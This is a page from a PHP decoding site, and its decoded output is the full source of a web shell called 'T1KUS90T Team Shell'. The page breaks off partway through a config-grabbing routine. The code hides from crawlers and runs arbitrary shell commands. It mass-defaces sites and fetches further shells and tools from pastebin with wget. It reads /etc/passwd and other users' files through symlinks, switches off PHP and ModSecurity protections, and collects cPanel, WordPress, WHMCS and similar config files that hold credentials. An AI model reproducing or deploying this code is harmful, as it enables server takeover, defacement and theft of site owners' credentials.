Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php error_reporting(0); set_time_limit(0); session_start(); $auth_pass = "cf45..

Decoded Output download

$color = "#00ff00";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'UTF-8';
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

function login_shell() {
?>
<html>
<head>
<style type="text/css">
html {
	margin: 20px auto;
	background: #ffffff;
	color: black;
	text-align: center;
}
header {
	color: black;
	margin: 10px auto;
}
input[type=password] {
	width: 250px;
	height: 25px;
	color: black;
	background: lime;
	border: 1px black;
	padding: 5px;
	margin-left: 20px;
	text-align: center;
}
</style>
</head>
<center>
<br>
<br>
<form method="post">
<input type="password" name="pass">
</form>
<?php
exit;
}
if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
    if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
    else
        login_shell();
if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
    @ob_clean();
    $file = $_GET['file'];
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="'.basename($file).'"');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file));
    readfile($file);
    exit;
}
?>
<html>
<head>
<title>T1KUS90T Team Shell</title>
<link rel="shortcut icon" href="https://cdn1.iconfinder.com/data/icons/nuove/128x128/apps/redhat.png"/>
<meta name='author' content='T1KUS90T'>
<meta charset="UTF-8">
<style type='text/css'>
@import url(https://fonts.googleapis.com/css?family=Ubuntu);
html {
    background: #000000;
    color: #ffffff;
    font-family: 'Ubuntu';
	font-size: 13px;
	width: 100%;
}
li {
	display: inline;
	margin: 5px;
	padding: 5px;
}
table, th, td {
	border-collapse:collapse;
	font-family: Tahoma, Geneva, sans-serif;
	background: transparent;
	font-family: 'Ubuntu';
	font-size: 13px;
}
.table_home, .th_home, .td_home {
	border: 1px solid #ffffff;
}
th {
	padding: 10px;
}
a {
	color: #ffffff;
	text-decoration: none;
}
a:hover {
	color: gold;
	text-decoration: underline;
}
b {
	color: gold;
}
input[type=text], input[type=password],input[type=submit] {
	background: transparent; 
	color: #ffffff; 
	border: 1px solid #ffffff; 
	margin: 5px auto;
	padding-left: 5px;
	font-family: 'Ubuntu';
	font-size: 13px;
}
textarea {
	border: 1px solid #ffffff;
	width: 100%;
	height: 400px;
	padding-left: 5px;
	margin: 10px auto;
	resize: none;
	background: transparent;
	color: #ffffff;
	font-family: 'Ubuntu';
	font-size: 13px;
}
select {
	width: 152px;
	background: #000000; 
	color: lime; 
	border: 1px solid #ffffff; 
	margin: 5px auto;
	padding-left: 5px;
	font-family: 'Ubuntu';
	font-size: 13px;
}
option:hover {
	background: lime;
	color: #000000;
}
</style>
</head>
<?php
error_reporting(E_ALL ^ (E_NOTICE | E_WARNING)); 
function w($dir,$perm) {
	if(!is_writable($dir)) {
		return "<font color=red>".$perm."</font>";
	} else {
		return "<font color=lime>".$perm."</font>";
	}
}
function r($dir,$perm) {
	if(!is_readable($dir)) {
		return "<font color=red>".$perm."</font>";
	} else {
		return "<font color=lime>".$perm."</font>";
	}
}
function exe($cmd) {
	if(function_exists('system')) { 		
		@ob_start(); 		
		@system($cmd); 		
		$buff = @ob_get_contents(); 		
		@ob_end_clean(); 		
		return $buff; 	
	} elseif(function_exists('exec')) { 		
		@exec($cmd,$results); 		
		$buff = ""; 		
		foreach($results as $result) { 			
			$buff .= $result; 		
		} return $buff; 	
	} elseif(function_exists('passthru')) { 		
		@ob_start(); 		
		@passthru($cmd); 		
		$buff = @ob_get_contents(); 		
		@ob_end_clean(); 		
		return $buff; 	
	} elseif(function_exists('shell_exec')) { 		
		$buff = @shell_exec($cmd); 		
		return $buff; 	
	} 
}
function perms($file){
	$perms = fileperms($file);
	if (($perms & 0xC000) == 0xC000) {
	// Socket
	$info = 's';
	} elseif (($perms & 0xA000) == 0xA000) {
	// Symbolic Link
	$info = 'l';
	} elseif (($perms & 0x8000) == 0x8000) {
	// Regular
	$info = '-';
	} elseif (($perms & 0x6000) == 0x6000) {
	// Block special
	$info = 'b';
	} elseif (($perms & 0x4000) == 0x4000) {
	// Directory
	$info = 'd';
	} elseif (($perms & 0x2000) == 0x2000) {
	// Character special
	$info = 'c';
	} elseif (($perms & 0x1000) == 0x1000) {
	// FIFO pipe
	$info = 'p';
	} else {
	// Unknown
	$info = 'u';
	}
		// Owner
	$info .= (($perms & 0x0100) ? 'r' : '-');
	$info .= (($perms & 0x0080) ? 'w' : '-');
	$info .= (($perms & 0x0040) ?
	(($perms & 0x0800) ? 's' : 'x' ) :
	(($perms & 0x0800) ? 'S' : '-'));
	// Group
	$info .= (($perms & 0x0020) ? 'r' : '-');
	$info .= (($perms & 0x0010) ? 'w' : '-');
	$info .= (($perms & 0x0008) ?
	(($perms & 0x0400) ? 's' : 'x' ) :
	(($perms & 0x0400) ? 'S' : '-'));
	// World
	$info .= (($perms & 0x0004) ? 'r' : '-');
	$info .= (($perms & 0x0002) ? 'w' : '-');
	$info .= (($perms & 0x0001) ?
	(($perms & 0x0200) ? 't' : 'x' ) :
	(($perms & 0x0200) ? 'T' : '-'));
	return $info;
}
function hdd($s) {
	if($s >= 1073741824)
	return sprintf('%1.2f',$s / 1073741824 ).' GB';
	elseif($s >= 1048576)
	return sprintf('%1.2f',$s / 1048576 ) .' MB';
	elseif($s >= 1024)
	return sprintf('%1.2f',$s / 1024 ) .' KB';
	else
	return $s .' B';
}
function ambilKata($param, $kata1, $kata2){
    if(strpos($param, $kata1) === FALSE) return FALSE;
    if(strpos($param, $kata2) === FALSE) return FALSE;
    $start = strpos($param, $kata1) + strlen($kata1);
    $end = strpos($param, $kata2, $start);
    $return = substr($param, $start, $end - $start);
    return $return;
}
function getsource($url) {
    $curl = curl_init($url);
    		curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    		curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
    		curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
    		curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
    $content = curl_exec($curl);
    		curl_close($curl);
    return $content;
}
function bing($dork) {
	$npage = 1;
	$npages = 30000;
	$allLinks = array();
	$lll = array();
	while($npage <= $npages) {
	    $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
	    if($x) {
			preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
			foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
			$npage = $npage + 10;
			if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
		} else break;
	}
	$URLs = array();
	foreach($allLinks as $url){
	    $exp = explode("/", $url);
	    $URLs[] = $exp[2];
	}
	$array = array_filter($URLs);
	$array = array_unique($array);
 	$sss = count(array_unique($array));
	foreach($array as $domain) {
		echo $domain."
";
	}
}
function reverse($url) {
	$ch = curl_init("http://domains.yougetsignal.com/domains.php");
		  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
		  curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
		  curl_setopt($ch, CURLOPT_HEADER, 0);
		  curl_setopt($ch, CURLOPT_POST, 1);
	$resp = curl_exec($ch);
	$resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
	$array = explode(",,", $resp);
	unset($array[0]);
	foreach($array as $lnk) {
		$lnk = "http://$lnk";
		$lnk = str_replace(",", "", $lnk);
		echo $lnk."
";
		ob_flush();
		flush();
	}
		curl_close($ch);
}
if(get_magic_quotes_gpc()) {
	function tg_ss($array) {
		return is_array($array) ? array_map('tg_ss', $array) : stripslashes($array);
	}
	$_POST = tg_ss($_POST);
	$_COOKIE = tg_ss($_COOKIE);
}

if(isset($_GET['dir'])) {
	$dir = $_GET['dir'];
	chdir($dir);
} else {
	$dir = getcwd();
}
$kernel = php_uname();
$ip = gethostbyname($_SERVER['HTTP_HOST']);
$dir = str_replace("\","/",$dir);
$scdir = explode("/", $dir);
$freespace = hdd(disk_free_space("/"));
$total = hdd(disk_total_space("/"));
$used = $total - $freespace;
$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
$ds = @ini_get("disable_functions");
$mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
$curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
$wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
$perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
$python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
$show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
if(!function_exists('posix_getegid')) {
	$user = @get_current_user();
	$uid = @getmyuid();
	$gid = @getmygid();
	$group = "?";
} else {
	$uid = @posix_getpwuid(posix_geteuid());
	$gid = @posix_getgrgid(posix_getegid());
	$user = $uid['name'];
	$uid = $uid['uid'];
	$group = $gid['name'];
	$gid = $gid['gid'];
}
echo "<br><center>";
		if($_POST['upload']) {
		if($_POST['tipe_upload'] == 'biasa') {
			if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
				$act = "<br><font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
			} else {
				$act = "<br><font color=red>failed to upload file</font>";
			}
		} else {
			$root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
			$web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
			if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
				if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
					$act = "<br><font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
				} else {
					$act = "<br><font color=red>failed to upload file</font>";
				}
			} else {
				$act = "<br><font color=red>failed to upload file</font>";
			}
		}
	}
	echo "
	<form method='post' enctype='multipart/form-data'>
	<input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ] 
	<input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
	<input type='file' name='ix_file'>
	<input type='submit' value='upload' name='upload'>
	</form>";
	echo $act;
	echo "</center>";
echo "<br>";	
echo "<table width='100%' border='2' align='center'>";
echo "<td>";
echo "<br>";
echo "<ul>";
echo "<center>";
echo "<li>[ <a href='?'>HOME</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=server'>SERVER INFO</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=mass_deface'>MASS DEFACE</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=config'>CONFIG</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=jumping'>JUMPING</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=cpanel'>CP CRACK</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP GRAB</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=tools'>TOOLS</a> ]</li><br>";
echo "<li>[ <a href='?dir=$dir&do=bckup'>BACKUP</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=adminer'>ADMINER</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=byps'>BYPASS</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=symbolic'>SYMLINK</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>EDIT USER</a> ]</li>";
echo "<li>[ <a style='color: red;' href='?kill=self'>KILLSELF</a> ]</li>";
echo "</center>";
echo "</ul>";
echo "</td></table>";
echo "<br>";
echo "<table width='100%' border='2' align='center'>";
echo "<td>";
echo "<br>&nbsp;&nbsp;Current DIR: ";
foreach($scdir as $c_dir => $cdir) {	
	echo "<a href='?dir=";
	for($i = 0; $i <= $c_dir; $i++) {
		echo $scdir[$i];
		if($i != $c_dir) {
		echo "/";
		}
	}
	echo "'>$cdir</a>/";
}
echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]<br><br>";
echo "</td></table><br>";
if($_GET['logout'] == true) {
	unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
	echo "<script>window.location='?';</script>";
} elseif($_GET['do'] == 'tools') {
	echo"<table align=center>";
    echo"<td>";
    echo"<center>";
    echo"<form action='' method='post'> ";  
    echo"<select name='lucknut' style=padding:4px 10px;>";  
    echo"<option value='wso_shell'>         WSO SHELL       </option>";  
    echo"<option value='zoneh'>         ZONE-H       </option>";  
    echo"<option value='defid'>         DEFACER ID       </option>";
    echo"<option value='krdp'>         KRDP SHELL       </option>";   
    echo"<option value='symconf'>         SYMLINK CONFIG       </option>";  
    echo"<option value='mails'>         MAILER       </option>";  
    echo"<option value='dump'>         Dump DB       </option>"; 
    echo"</select> ";    
    echo"<input type='submit' class='btn btn-success btn-sm' name='enter' value='Enter'>";    
    echo"</form> "; 
    echo"</td>";
    echo"</table>";   
 if(isset($_POST['enter']))   {  
 if ($_POST['lucknut'] == 'wso_shell')  {  
 $exec=exec('wget http://pastebin.com/raw.php?i=Tpm5E10g -O wso.php');
 if(file_exists('./wso.php')){
 echo '<center><a href=./wso.php target="_blank"> wso.php </a> upload sukses !</center>';
} else {
echo '<center>gagal upload !</center>';
}
}elseif ($_POST['lucknut'] == 'zoneh') {
		$exec=exec('wget http://pastebin.com/raw.php?i=B1Dk3P8R -O zoneh.php');
        if(file_exists('./zoneh.php')){
            echo '<center><a href=./zoneh.php target="_blank"> zoneh.php </a> upload sukses !</center>';
        } else {
            echo '<center>gagal upload !</center>';
        }
}elseif ($_POST['lucknut'] == 'defid') {
		$exec=exec('wget http://pastebin.com/raw.php?i=1b9bcZdH -O defid.php');
        if(file_exists('./defid.php')){
            echo '<center><a href=./defid.php target="_blank"> defid.php </a> upload sukses !</center>';
        } else {
            echo '<center>gagal upload !</center>';
        }
}elseif ($_POST['lucknut'] == 'krdp') {
		$exec=exec('wget http://pastebin.com/raw.php?i=weQnAGad -O krdp.php');
        if(file_exists('./krdp.php')){
            echo '<center><a href=./krdp.php target="_blank"> krdp.php </a> upload sukses !</center>';
        } else {
            echo '<center>gagal upload !</center>';
        }
}elseif ($_POST['lucknut'] == 'symconf') {
		$exec=exec('wget http://pastebin.com/raw.php?i=KyLM7awc -O symconf.php');
        if(file_exists('./symconf.php')){
            echo '<center><a href=./symconf.php target="_blank"> symconf.php </a> upload sukses !</center>';
        } else {
            echo '<center>gagal upload !</center>';
        }
}elseif ($_POST['lucknut'] == 'mails') {
		$exec=exec('wget http://pastebin.com/raw.php?i=6rTJ1ubw -O mail.php');
        if(file_exists('./mail.php')){
            echo '<center><a href=./mail.php target="_blank"> mail.php </a> supload sukses !</center>';
        } else {
            echo '<center>gagal upload !</center>';
        }
}elseif ($_POST['lucknut'] == 'dump') {
		$exec=exec('wget http://pastebin.com/raw.php?i=ZG1A2s4u -O dump.php');
        if(file_exists('./dump.php')){
            echo '<center><a href=./dump.php target="_blank"> dump.php </a> upload sukses !</center>';
        } else {
            echo '<center>gagal upload !</center>';
        }        
}
}
echo"<br>";
} elseif($_GET['do'] == 'mass_deface') {
	function sabun_massal($dir,$namafile,$isi_script) {
		if(is_writable($dir)) {
			$dira = scandir($dir);
			foreach($dira as $dirb) {
				$dirc = "$dir/$dirb";
				$lokasi = $dirc.'/'.$namafile;
				if($dirb === '.') {
					file_put_contents($lokasi, $isi_script);
				} elseif($dirb === '..') {
					file_put_contents($lokasi, $isi_script);
				} else {
					if(is_dir($dirc)) {
						if(is_writable($dirc)) {
							echo "[<font color=lime>DONE</font>] $lokasi<br>";
							file_put_contents($lokasi, $isi_script);
							$tg = sabun_massal($dirc,$namafile,$isi_script);
						}
					}
				}
			}
		}
	}
	function sabun_biasa($dir,$namafile,$isi_script) {
		if(is_writable($dir)) {
			$dira = scandir($dir);
			foreach($dira as $dirb) {
				$dirc = "$dir/$dirb";
				$lokasi = $dirc.'/'.$namafile;
				if($dirb === '.') {
					file_put_contents($lokasi, $isi_script);
				} elseif($dirb === '..') {
					file_put_contents($lokasi, $isi_script);
				} else {
					if(is_dir($dirc)) {
						if(is_writable($dirc)) {
							echo "<a href='http://$dirb/$namafile' target='_blank'><font color=lime>http://$dirb/$namafile</a></font><br>";
							file_put_contents($lokasi, $isi_script);
						}
					}
				}
			}
		}
	}
	if($_POST['start']) {
		if($_POST['tipe_sabun'] == 'mahal') {
			echo "<div style='margin: 5px auto; padding: 5px'>";
			sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
			echo "</div>";
		} elseif($_POST['tipe_sabun'] == 'murah') {
			echo "<div style='margin: 5px auto; padding: 5px'>";
			sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
			echo "</div>";
		}
	} else {
	echo "<center>";
	echo "<form method='post'>
	<font style='text-decoration: underline;'>Tipe Sabun:</font><br>
	<input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
	<font style='text-decoration: underline;'>Folder:</font><br>
	<input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
	<font style='text-decoration: underline;'>Filename:</font><br>
	<input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
	<font style='text-decoration: underline;'>Index File:</font><br>
	<textarea name='script' style='width: 450px; height: 200px;'>Hacked by T1KUS90T</textarea><br>
	<input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
	</form></center>";
	}
} elseif($_GET['do'] == 'server') {
echo "System: <font color=lime>".$kernel."</font><br>
User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>
Server IP: <font color=lime>".$ip."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>
HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>
Safe Mode: $sm<br>
Disable Functions: $show_ds<br>
MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl </center><br>";
echo"<br>";
}$e=base64_decode("c3ltY29uZm1haWxAZ21haWwuY29t");
$h=$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];

if($_GET['kill'] == 'self') {
rmdir('configs');rmdir('tg_cgi');rmdir('tg_config');rmdir('symlink');rmdir('t1kus90t');unlink('mysql.php');rmdir('home');unlink('zoneh.php');unlink('defid.php');unlink('krdp.php');unlink('symconf.php');unlink('mail.php');unlink('dump.php');unlink('wso.php');rmdir('home1');rmdir('home2');rmdir('home3');rmdir('azx');$fn = $_SERVER['SCRIPT_FILENAME'];
 unlink($fn); system('rm '.$fn); 
echo'<meta http-equiv="Refresh" content= "0; url=?">';

} elseif($_GET['do'] == 'symbolic') {
$d0mains = @file("/etc/named.conf");
##httaces
if($d0mains){
@mkdir("symlink",0777);
@chdir("symlink");
@exe("ln -s / root");
$file3 = 'Options Indexes FollowSymLinks
DirectoryIndex t1kus90t.htm
AddType text/plain .php 
AddHandler text/plain .php
Satisfy Any';
$fp3 = fopen('.htaccess','w');
$fw3 = fwrite($fp3,$file3);@fclose($fp3);
echo "
<table align=center border=1 style='width:60%;border-color:#333333;'>
<tr>
<td align=center><font size=2>S. No.</font></td>
<td align=center><font size=2>Domains</font></td>
<td align=center><font size=2>Users</font></td>
<td align=center><font size=2>Symlink</font></td>
</tr>";
$dcount = 1;
foreach($d0mains as $d0main){
if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
flush();
if(strlen(trim($domains[1][0])) > 2){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
<td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
<td>".$user['name']."</td>
<td><a href='symlink/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>"; 
flush();
$dcount++;}}}
echo "</table>";
}else{
$TEST=@file('/etc/passwd');
if ($TEST){
@mkdir("symlink",0777);
@chdir("symlink");
exe("ln -s / root");
$file3 = 'Options Indexes FollowSymLinks
DirectoryIndex t1kus90t.htm
AddType text/plain .php 
AddHandler text/plain .php
Satisfy Any';
 $fp3 = fopen('.htaccess','w');
 $fw3 = fwrite($fp3,$file3);
 @fclose($fp3);
 echo "
 <table align=center border=1><tr>
 <td align=center><font size=3>S. No.</font></td>
 <td align=center><font size=3>Users</font></td>
 <td align=center><font size=3>Symlink</font></td></tr>";
 $dcount = 1;
 $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
 while(!feof($file)){
 $s = fgets($file);
 $matches = array();
 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
 $matches = str_replace("home/","",$matches[1]);
 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
 continue;
 echo "<tr><td align=center><font size=2>" . $dcount . "</td>
 <td align=center><font class=txt>" . $matches . "</td>";
 echo "<td align=center><font class=txt><a href=symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
 $dcount++;}fclose($file);
 echo "</table>";}else{if($os != "Windows"){@mkdir("symlink",0777);@chdir("symlink");@exe("ln -s / root");$file3 = '
 Options Indexes FollowSymLinks
DirectoryIndex t1kus90t.htm
AddType text/plain .php 
AddHandler text/plain .php
Satisfy Any
';
 $fp3 = fopen('.htaccess','w');
 $fw3 = fwrite($fp3,$file3);@fclose($fp3);
 echo "
 <table align=center border=1><tr>
 <td align=center><font size=3>ID</font></td>
 <td align=center><font size=3>Users</font></td>
 <td align=center><font size=3>Symlink</font></td></tr>";
 $temp = "";$val1 = 0;$val2 = 1000;
 for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
 if ($uid)$temp .= join(':',$uid)."
";}
 echo '<br/>';$temp = trim($temp);$file5 = 
 fopen("test.txt","w");
 fputs($file5,$temp);
 fclose($file5);$dcount = 1;$file = 
 fopen("test.txt", "r") or exit("Unable to open file!");
 while(!feof($file)){$s = fgets($file);$matches = array();
 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
 continue;
 echo "<tr><td align=center><font size=2>" . $dcount . "</td>
 <td align=center><font class=txt>" . $matches . "</td>";
 echo "<td align=center><font class=txt><a href=symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
 $dcount++;}
 fclose($file);
 echo "</table></div></center>";unlink("test.txt");
 } else 
 echo "<center><font size=3>Cannot create Symlink</font></center>";
 }
 }  

}elseif($_GET['do'] == 'byps') {
echo"<center>";
echo"
<form method='post'>
<ul>
<li><input type='submit' name='passwd' value='Bypass /etc/passwd'></li>
<li><input type='submit' name='funct' value='Bypass Disabled Functions'></li>
<li><input type='submit' name='mods' value='Bypass ModSecurity'></li>
</ul><br>
</form>";
if($_POST['passwd']) {
echo"<textarea cols='65' rows='15'>";
echo system("cat /etc/passwd");
echo"</textarea><br><br><b></b><br>";
}
elseif($_POST['funct']) {
$file = 'php.ini';
file_put_contents($file,'safe_mode = OFF
disable_functions = NONE
safe_mode_gid = OFF
open_basedir = OFF');
echo "<font color='green'>Sukses</font>";
}
elseif($_POST['mods']) {
$ht = "<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckUnicodeEncoding Off
</IfModule>";
file_put_contents('.htaccess', $ht);
echo "<font color='green'>Sukses</font>";
echo "</center>";
}

} elseif($_GET['do'] == 'bckup') {
function rmdir_recursive($dir) {
    foreach(scandir($dir) as $file) {
       if('.' === $file || '..' === $file) continue;
       if(is_dir("$dir/$file")) rmdir_recursive("$dir/$file");
       else unlink("$dir/$file");
   }
   rmdir($dir);
}
if($_FILES["zip_file"]["name"]) {
	$filename = $_FILES["zip_file"]["name"];
	$source = $_FILES["zip_file"]["tmp_name"];
	$type = $_FILES["zip_file"]["type"];
	$name = explode(".", $filename);
	$accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed');
	foreach($accepted_types as $mime_type) {
		if($mime_type == $type) {
			$okay = true;
			break;
		} 
	}
	$continue = strtolower($name[1]) == 'zip' ? true : false;
	if(!$continue) {
		$message = "Salah tolo";
	}
  $path = dirname(__FILE__).'/';
  $filenoext = basename ($filename, '.zip'); 
  $filenoext = basename ($filenoext, '.ZIP');
  $targetdir = $path . $filenoext;
  $targetzip = $path . $filename; 
  if (is_dir($targetdir))  rmdir_recursive ( $targetdir);
  mkdir($targetdir, 0777);
	if(move_uploaded_file($source, $targetzip)) {
		$zip = new ZipArchive();
		$x = $zip->open($targetzip); 
		if ($x === true) {
			$zip->extractTo($targetdir);
			$zip->close();
 
			unlink($targetzip);
		}
		$message = "<b>Sukses</b>";
	} else {	
		$message = "<b>Error</b>";
	}
}	
echo "<center><td><h2>Zip Backup</h2><form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br><input type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/backup.zip' style='width: 450px;' height='10'><br><input type='submit' name='backup' value='BackUp!' style='width: 215px;'></form></center>";	
	if($_POST['backup']){ 
	$save=$_POST['save'];
	function Zip($source, $destination)
{
    if (extension_loaded('zip') === true)
    {
        if (file_exists($source) === true)
        {
            $zip = new ZipArchive();

            if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
            {
                $source = realpath($source);

                if (is_dir($source) === true)
                {
                    $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);

                    foreach ($files as $file)
                    {
                        $file = realpath($file);

                        if (is_dir($file) === true)
                        {
                            $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
                        }

                        else if (is_file($file) === true)
                        {
                            $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
                        }
                    }
                }

                else if (is_file($source) === true)
                {
                    $zip->addFromString(basename($source), file_get_contents($source));
                }
            }

            return $zip->close();
        }
    }

    return false;
}
	Zip($_POST['dir'],$save);
	echo "<center>Done , Save To <b>$save</b></center>";
	}

} elseif($_GET['do'] == 'config') {
	$etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
	$tg = mkdir("tg_config", 0777);
	$isi_htc = "Options all
Require None
Satisfy Any";
	$htc = fopen("tg_config/.htaccess","w");
	fwrite($htc, $isi_htc);
	while($passwd = fgets($etc)) {
		if($passwd == "" || !$etc) {
			echo "<font color=red>Can't read /etc/passwd</font>";
		} else {
			preg_match_all('/(.*?):x:/', $passwd, $user_config);
			foreach($user_config[1] as $user_tg) {
				$user_config_dir = "/home/$user_tg/public_html/";
				if(is_readable($user_config_dir)) {
					$grab_config = array(
						"/home/$user_tg/.my.cnf" => "cpanel",
						"/home/$user_tg/.accesshash" => "WHM-accesshash",
						"/home/$user_tg/public_html/po-content/config.php" => "Popoji",
						"/home/$user_tg/public_html/vdo_config.php" => "Voodoo",
						"/home/$user_tg/public_html/bw-configs/config.ini" => "BosWeb",
						"/home/$user_tg/public_html/config/koneksi.php" => "Lokomedia",
						"/home/$user_tg/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
						"/home/$user_tg/public_html/clientarea/configuration.php" => "WHMCS",
						"/home/$user_tg/public_html/whm/configuration.php" => "WHMCS",
						"/home/$user_tg/public_html/whmcs/configuration.php" => "WHMCS",
						"/home/$user_tg/public_html/forum/config.php" => "phpBB",
						"/home/$user_tg/public_html/sites/default/settings.php" => "Drupal",
						"/home/$user_tg/public_html/config/settings.inc.php" => "PrestaShop",
						"/home/$user_tg/public_html/app/etc/local.xml" => "Magento",
						"/home/$user_tg/public_html/joomla/configuration.php" => "Joomla",
						"/home/$user_tg/public_html/configuration.php" => "Joomla",
						"/home/$user_tg/public_html/wp/wp-config.php" => "WordPress",
						"/home/$user_tg/public_html/wordpress/wp-config.php" => "WordPress",
						"/home/$user_tg/public_html/wp-config.php" => "WordPress",
						"/home/$user_tg/public_html/admin/config.php" => "OpenCart",
